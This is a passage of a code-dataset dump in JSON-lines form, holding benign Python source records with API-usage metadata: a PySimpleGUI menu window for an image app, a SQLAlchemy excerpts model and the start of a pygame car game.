{"api_name": "utils.KEY.ID", "line_number": 370, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 370, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 370, "usage_type": "attribute"}, {"api_name": "utils.KEY.LAUNCHER", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 373, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 391, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 391, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 407, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 407, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 409, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 409, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 410, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 410, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 411, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 411, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 412, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 412, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 413, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 413, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 414, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 414, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 415, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 417, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 417, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 433, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 433, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 435, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 435, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 436, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 436, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 437, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 437, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 438, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 438, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 440, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 440, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 454, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 454, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 454, "usage_type": "attribute"}, {"api_name": "utils.KEY.OPERATION", "line_number": 456, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 456, "usage_type": "name"}, {"api_name": "utils.KEY.OPERATION", "line_number": 458, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 458, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 463, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 463, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 463, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 463, "usage_type": "name"}, {"api_name": "utils.KEY.OPERATION", "line_number": 470, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 470, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 471, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 473, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.KEY.OPERATION", "line_number": 473, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 475, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 475, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 494, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 494, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 494, "usage_type": "attribute"}, {"api_name": "utils.KEY.CONTENT", "line_number": 496, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 496, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 500, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 500, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 500, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY.CONTENT", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 515, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 519, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 519, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 519, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 531, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 531, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 537, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 537, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 537, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 537, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 540, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 540, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 561, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 561, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 566, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 566, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 566, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 566, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 569, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 569, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 570, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 570, "usage_type": "name"}, {"api_name": "utils.KEY.AUTHOR_ID", "line_number": 571, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 571, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 572, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 572, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 573, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 573, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 575, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 575, "usage_type": "name"}, {"api_name": "utils.KEY.AUTHOR_ID", "line_number": 575, "usage_type": "attribute"}, {"api_name": "utils.KEY.AUTHOR", "line_number": 578, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 578, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 578, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 596, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 596, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 596, "usage_type": "attribute"}, {"api_name": "utils.KEY.TYPE", "line_number": 596, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 600, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 600, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 600, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY.TYPE", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 616, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 616, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 616, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 620, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 620, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 620, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 620, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 620, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 639, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 641, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 641, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 644, "usage_type": "call"}, {"api_name": "utils.KEY.VALUE", "line_number": 644, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 644, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 655, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 655, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 655, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY.USER_ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 671, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 671, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 671, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 671, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 676, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 676, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 676, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 676, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 676, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 676, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 693, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 693, "usage_type": "name"}, {"api_name": "utils.KEY.HEALTH_ID", "line_number": 696, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 696, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 697, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 697, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 698, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 698, "usage_type": "name"}, {"api_name": "utils.KEY.VALUE", "line_number": 699, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 699, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 700, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 700, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 714, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 714, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 719, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 719, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 719, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 719, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 741, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 741, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 741, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 746, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 746, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 746, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 746, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 746, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 763, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 763, "usage_type": "name"}, {"api_name": "utils.KEY.ILLNESS_ID", "line_number": 766, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 766, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 767, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 767, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 768, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 768, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 769, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 769, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 783, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 783, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 789, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 789, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 789, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 789, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 809, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 809, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 813, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 813, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 813, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 813, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 826, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 826, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 832, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 832, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 832, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 832, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 851, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 851, "usage_type": "name"}]}
+{"seq_id": "5330771592", "text": "import PySimpleGUI as sg\nimport ventanas.configuracion as confg\nimport os\nimport ventanas.GeneradorImagen as img\nimport ventanas.interfaz_meme as meme\nimport ventanas.ActualizarPerfil as act\nfrom PIL import Image, ImageDraw, ImageOps\nimport io\nimport os\nimport json\nimport ventanas.Ayuda as ayuda\nimport ventanas.EtiquetarImagenes as etiquetar\n\ndef MostrarImagen(ruta_imagen):\n imagen=Image.open(ruta_imagen)\n \n #Recorto la imagen de forma circular y la adapto a las medidas que yo busco \n \n ancho=50\n alto=50\n imagen = imagen.resize((ancho, alto))\n mascara = Image.new('L', (ancho, alto), 0)\n dibujo = ImageDraw.Draw(mascara)\n dibujo.ellipse((0, 0, ancho, alto), fill=350)\n imagen = ImageOps.fit(imagen, mascara.size, centering=(0.5, 0.5))\n imagen.putalpha(mascara)\n imagen = imagen.convert('RGBA')\n # Convertir la imagen en un búfer de bytes\n with io.BytesIO() as output:\n imagen.save(output, format='PNG')\n data = output.getvalue()\n return data\n\ndef crearVentana(datos,nickname):\n print(datos)\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_imagenes=os.path.abspath(os.path.join(directorio,\"..\",\"imagenes\"))\n directorio_perfil=os.path.abspath(os.path.join(directorio_imagenes,nickname[0]+\".png\"))\n #sg.set_options(font=(\"Cooper Black\",16))\n data=MostrarImagen(directorio_perfil)\n\n menu =[ [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Generador de Memes',key=\"-mem-\",size=(25,1))],\n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Generador de Collage',key=\"-collage-\",size=(25,1))],\n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Etiquetar Imágenes',key=\"-img-\",size=(25,1))], \n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Salir',pad=(90,2))]\n ]\n barra_layout =[sg.Column(\n [\n [sg.Button(image_data=data, enable_events=True, image_subsample=2, border_width=0, button_color=\"Tan\", key=\"-actualizar-\")],\n [sg.Text(\" \"+nickname[0], font=(\"Black\",11), background_color=\"Tan\")]\n ],\n element_justification=\"left\",\n justification=\"left\",\n background_color=\"Tan\"\n ),sg.Push(\"Tan\"),\n sg.Column(\n [[ \n sg.Button(image_filename=os.path.abspath(os.path.join(directorio_imagenes,\"configuracion.png\")),button_color=\"Tan\",key=\"config\",border_width=0), \n \n sg.Image(background_color=\"tan\",size=(5,5)),\n \n sg.Button(image_filename=os.path.abspath(os.path.join(directorio_imagenes,\"ayuda.png\")),button_color=\"Tan\", border_width=0,key='help'), \n ]])\n ]\n\n \n layout = [[\n barra_layout,\n sg.Column(menu,background_color=\"Tan\",)]\n ]\n \n window = sg.Window(\"Menú Principal\", layout,finalize=True,resizable=True,element_justification=\"Center\")\n window.set_min_size((500,500))\n window.BackgroundColor=(\"Tan\")\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_direcciones=os.path.abspath(os.path.join(directorio,\"direcciones.txt\"))\n try:\n lectura=open(directorio_direcciones,\"r\")\n except FileNotFoundError:\n escritura=open(directorio_direcciones,\"w\")\n escritura.write (directorio_imagenes+\"@\"+directorio_imagenes+\"@\"+directorio_imagenes)\n escritura.close()\n lectura=open(directorio_direcciones,\"r\")\n lista=lectura.readline()\n lista=lista.split(\"@\")\n for e in lista:\n dir_im=lista[0]\n dir_coll=lista[1]\n dir_mem=lista[2]\n lectura.close()\n \n while True:\n event, values = window.read()\n \n if event in (sg.WIN_CLOSED, 'Salir'):\n break\n elif event == ('help'):\n ayuda.crearVentana()\n elif event==\"-actualizar-\":\n dicc={}\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_direcciones=os.path.abspath(os.path.join(directorio,\"..\",\"perfiles.json\"))\n archivo=open(directorio_direcciones,\"r\") \n dicc=json.load(archivo)\n archivo.close()\n lista=act.CrearVentana(datos,nickname)\n print(lista)\n datos=lista\n dicc[nickname[0]]=lista\n archivo= open(directorio_direcciones,\"w\")\n json.dump(dicc,archivo)\n archivo.close()\n window[\"-actualizar-\"].update(image_data=MostrarImagen(dicc[nickname[0]][3]))\n elif event == 'config':\n confg.CrearVentana()\n elif event == '-mem-':\n meme.crearVentana()\n elif event == \"-collage-\":\n img.crearVentana()\n elif event==\"-img-\":\n etiquetar.crearVentana(dir_im,nickname)\n window.close()\n \n", "repo_name": "Valenturco/python_proyecto", "sub_path": "grupo36-main-unlpimage/unlpimage/ventanas/Menu_Principal.py", "file_name": "Menu_Principal.py", "file_ext": "py", "file_size_in_byte": 4934, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 15, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 23, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 23, "usage_type": "name"}, {"api_name": "PIL.ImageOps.fit", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 25, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 42, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 43, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 44, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 45, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 46, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 48, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 49, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 51, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 53, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 54, "usage_type": "call"}, {"api_name": "PySimpleGUI.Push", "line_number": 59, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 60, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 64, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 73, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "PySimpleGUI.WIN_CLOSED", "line_number": 99, "usage_type": "attribute"}, {"api_name": "ventanas.Ayuda.crearVentana", "line_number": 102, "usage_type": "call"}, {"api_name": "ventanas.Ayuda", "line_number": 102, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "json.load", "line_number": 108, "usage_type": "call"}, {"api_name": "ventanas.ActualizarPerfil.CrearVentana", "line_number": 110, "usage_type": "call"}, {"api_name": "ventanas.ActualizarPerfil", "line_number": 110, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 115, "usage_type": "call"}, {"api_name": "ventanas.configuracion.CrearVentana", "line_number": 119, "usage_type": "call"}, {"api_name": "ventanas.configuracion", "line_number": 119, "usage_type": "name"}, {"api_name": "ventanas.interfaz_meme.crearVentana", "line_number": 121, "usage_type": "call"}, {"api_name": "ventanas.interfaz_meme", "line_number": 121, "usage_type": "name"}, {"api_name": "ventanas.GeneradorImagen.crearVentana", "line_number": 123, "usage_type": "call"}, {"api_name": "ventanas.GeneradorImagen", "line_number": 123, "usage_type": "name"}, {"api_name": "ventanas.EtiquetarImagenes.crearVentana", "line_number": 125, "usage_type": "call"}, {"api_name": "ventanas.EtiquetarImagenes", "line_number": 125, "usage_type": "name"}]}
+{"seq_id": "3221566909", "text": "from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom sqlalchemy.types import PickleType\n\nBase = declarative_base()\n\nclass DBExcerpts(Base):\n __tablename__ = 'excerpts'\n\n excerpt_id = Column(String(100), \n primary_key=True,\n nullable=False, \n unique=True)\n excerpt_processed = Column(String(10005),\n nullable=False)\n city = Column(String(50), \n nullable=False)\n state = Column(String(2),\n nullable=False)\n excerpt_vector = Column(String(10),#PickleType\n nullable=False)\n source_date = Column(Date, \n nullable=False)\n\n# def __repr__(self):\n# return f\"Excerpt: {self.excerpt_processed} - Date: {self.source_date} - City: {self.state} - State: {self.city} - Vector: {self.excerpt_vector}\"\n\n", "repo_name": "MLRG-CEFET-RJ/qdrec", "sub_path": "api/querido_diario/db/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 5, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Date", "line_number": 22, "usage_type": "argument"}]}
+{"seq_id": "14432026174", "text": "#Imports\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\nimport random, time\r\n\r\n#Initialzing the pygame\r\npygame.init()\r\n\r\n#Setting up FPS \r\nFPS = 60\r\nFramePerSec = pygame.time.Clock()\r\n\r\n#Creating colors\r\nBLUE = (0, 0, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\n\r\n#Other Variables for use in the program\r\nSCREEN_WIDTH = 400\r\nSCREEN_HEIGHT = 600\r\nSPEED = 5\r\nSCORE = 0\r\n\r\n#Setting up Fonts\r\nfont = pygame.font.SysFont(\"Verdana\", 60)\r\nfont_small = pygame.font.SysFont(\"Verdana\", 20)\r\ngame_over = font.render(\"Game Over\", True, BLACK)\r\n\r\nbackground = pygame.image.load(\"AnimatedStreet.png\") # loading a backgroud\r\n\r\n#Create a white screen \r\nDISPLAYSURF = pygame.display.set_mode((400,600))\r\nDISPLAYSURF.fill(WHITE)\r\npygame.display.set_caption(\"Game\")\r\n\r\n# Create a Coin class \r\nclass Coin(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__()\r\n self.image = pygame.Surface((50,50)) # create a surface\r\n self.image.fill((255,232,0)) # Fill to the yellow color \r\n self.rect = self.image.get_rect() # convert to self rect\r\n self.rect.y = 0\r\n self.rect.x = random.randint(10,SCREEN_WIDTH-50) #Generate random position for x value\r\n def move(self):\r\n self.rect.y += 5 # moving with speed 5\r\n # if we do not collide with player then again generate on the top \r\n if self.rect.y > SCREEN_HEIGHT:\r\n self.rect.y = 0\r\n self.rect.x = random.randint(10,SCREEN_WIDTH-10)\r\n\r\n# create an Enemy class\r\nclass Enemy(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__() \r\n self.image = pygame.image.load(\"Enemy.png\")\r\n self.rect = self.image.get_rect() # creating a rect object\r\n self.rect.center = (random.randint(40,SCREEN_WIDTH-40), 0) # creating a random position\r\n\r\n def move(self):\r\n global SCORE\r\n self.rect.move_ip(0,SPEED) # move_ip it is the rectangle function which help to change the position\r\n if (self.rect.bottom > 600):\r\n SCORE += 1 # if we do not collide with player , then + 1 point to the score \r\n self.rect.top = 0\r\n self.rect.center = 